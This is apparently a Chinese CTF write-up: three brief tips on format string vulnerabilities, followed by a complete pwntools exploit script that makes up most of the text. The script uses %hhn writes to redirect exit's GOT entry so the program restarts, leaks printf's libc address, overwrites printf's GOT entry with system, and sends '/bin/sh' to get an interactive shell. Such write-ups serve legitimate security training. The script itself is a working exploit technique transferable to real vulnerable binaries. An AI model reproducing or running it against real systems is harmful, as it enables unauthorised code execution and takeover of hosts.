格式化参数漏洞小技巧

做完ctf总结一下

1。如果程序无法一次完成可以更改一个got表回到程序开始

2。尽可能用hhn可以减小输出次数，不然接收会有问题

3。字符串偏移如果不好算可以输出a来对齐

from pwn import *
exit_got=0x0804a024
#0804866b
print_got=0x0804a014
z1=0x0804
z1-=8
z2=0x866d
z2-=0x0804
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
p=process('./pwn1')
#gdb.attach(p)
print p.recvuntil('Welcome~\n')
payload = '%{0}d%32$hhn%{1}d%33$hhn%{2}d%34$hhn%{3}d%35$hhn'.format((0x6E)%0x100,(0x186-0x6e)%0x100,(0x104-0x86)%0x100,(0x108-0x4));
payload = payload + 'a'* (100-len(payload)) + p32(exit_got) + p32(exit_got + 1) + p32(exit_got + 2) + p32(exit_got + 3)
p.sendline(payload)
print p.recvuntil("\n")
payload=p32(print_got)+"%7$s"
p.sendline(payload)
p.recv(4)
printf_addr=u32(p.recv(4))
print "%x"%(printf_addr)
system_addr=printf_addr-libc.symbols['printf']+libc.symbols['system']
syslow1 = system_addr%0x100
syslow2 = (system_addr/0x100)%0x100
syslow3 = (system_addr/0x10000)%0x100
syslow4 = (system_addr/0x1000000)%0x100
payload = '%{0}d%32$hhn%{1}d%33$hhn%{2}d%34$hhn%{3}d%35$hhn'.format(syslow1,(0x100+syslow2-syslow1)%0x100,(0x100+syslow3-syslow2)%0x100,(0x100+syslow4-syslow3)%0x100);
payload = payload + 'a' * (100-len(payload)) + p32(print_got) + p32(print_got + 1) + p32(print_got + 2) + p32(print_got + 3)
p.sendline(payload)
p.sendline("/bin/sh\x00")
p.interactive()